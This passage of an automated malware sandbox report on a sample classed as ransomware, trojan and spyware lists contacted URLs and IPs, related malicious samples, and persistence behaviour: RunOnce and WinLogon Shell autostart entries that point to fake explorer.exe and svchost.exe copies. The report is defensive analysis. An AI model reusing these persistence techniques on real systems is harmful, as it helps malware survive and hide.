                                                                  		unknown
                                                                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://icanhazip.com4AppLaunch.exe, 00000002.00000002.277665850.00000000072EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://yoast.com/wordpress/plugins/seo/explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411158230.0000000003B24000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.408331910.0000000003B24000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537924053.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.374604090.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411195559.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                        		high
                                                                        https://zxq.net/wp-content/uploads/2022/07/Best-Mothers-Day-Gifts-of-2022-for-Every-Mom-01-300x169.jwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://zxq.net/wp-content/uploads/2022/07/The-Future-of-Cryptocurrency-Is-it-Time-to-Get-Your-Cryptwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://zxq.net/what-happened-to-the-old-zxq-website/neexplorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://zxq.net/what-happened-to-the-old-zxq-website/Lexplorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-1024x576.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340255237.000001401B842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://zxq.net/xmlrpc.php?rsdexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://zxq.net/online-shopping-tips-during-covid/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://zxq.net/news/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://zxq.net/?p=187explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://zxq.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fzxq.net%2Fwhat-happened-to-the-old-zxq-wewhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-content/themes/smart-mag/style.css?ver=7.1.1explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/How-To--150x89.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-150x84.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/How-To--768x457.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-includes/js/jquery/jquery.min.js?ver=3.6.0explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-30what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/what-happened-to-the-old-zxq-website/nexplorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://zxq.net/wp-json/wp/v2/pages/187explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.18.114.97
                                                                              		icanhazip.comUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              142.250.145.82
                                                                              		googlecode.l.googleusercontent.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              51.81.194.202
                                                                              		zxq.netUnited States
                                                                              		16276OVHFRtrue

                                                                              Private

                                                                              IP
                                                                              192.168.2.1
                                                                              127.0.0.1

                                                                              General Information

                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                              Analysis ID:679096
                                                                              Start date and time: 05/08/202209:07:532022-08-05 09:07:53 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 11m 10s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:Lg3gn9y1Cj.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:58
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.rans.troj.spyw.evad.winEXE@144/20@13/5
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 1.9% (good quality ratio 0%)
                                                                              • Quality average: 0%
                                                                              • Quality standard deviation: 0%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 22
                                                                              • Number of non-executed functions: 100
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Adjust boot time
                                                                              • Enable AMSI

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe
                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 40.125.122.176, 52.242.101.226, 20.238.103.94, 20.223.24.244, 20.54.89.106
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              09:09:09API Interceptor1028x Sleep call for process: lg3gn9y1cj.exe modified
                                                                              09:09:16API Interceptor1x Sleep call for process: AppLaunch.exe modified
                                                                              09:09:18API Interceptor71x Sleep call for process: svchost.exe modified
                                                                              09:09:18API Interceptor361x Sleep call for process: explorer.exe modified
                                                                              09:09:23AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\system\explorer.exe RO
                                                                              09:09:33AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\system\svchost.exe RO
                                                                              09:09:52AutostartRun: WinLogon Shell C:\Windows\explorer.exe
                                                                              09:10:02AutostartRun: WinLogon Shell c:\windows\system\explorer.exe

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              104.18.114.973djX04cCOE.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              Revised shipment.pdf.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              Swift.txt.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              9KZPWGuxKu.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              9ED17l5AHb.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              Demmurage_INV00245.pdf.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              doc 20220726 009910 984993.pdf.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              Ziraat Bankas Swift Mesaj.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              yHYWC.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              doc 27008875424678 001.pdf.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              RFQ___PR.EXEGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              Halkbank_Ekstre.pdf.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              yHYWC.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              Halkbank_Ekstre_20220725_074425_761711,pdf.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              m7iukFCY93.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              Z5TmBKZt0m.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              FdVDrKk96j.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              lOmEI6ECJl.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/
                                                                              lvPjWUoB3v.exeGet hashmaliciousBrowse
                                                                              • icanhazip.com/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              zxq.netEZbZDkFEQ1.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              GrSqMbdG99.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              7qrNClSmv7.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              CaQ2QvZfBW.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              m7iukFCY93.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Bc90WRHFvI.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              1MWUDNFaqS.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              JJ4pJ5eAfS.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              044471EOyJ.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              no6slYvsOk.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              nKGZsgg0Ev.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              k8765434567890980.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Quote#099992114842_pdf.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              3fA0f8HFeu.exeGet hashmaliciousBrowse
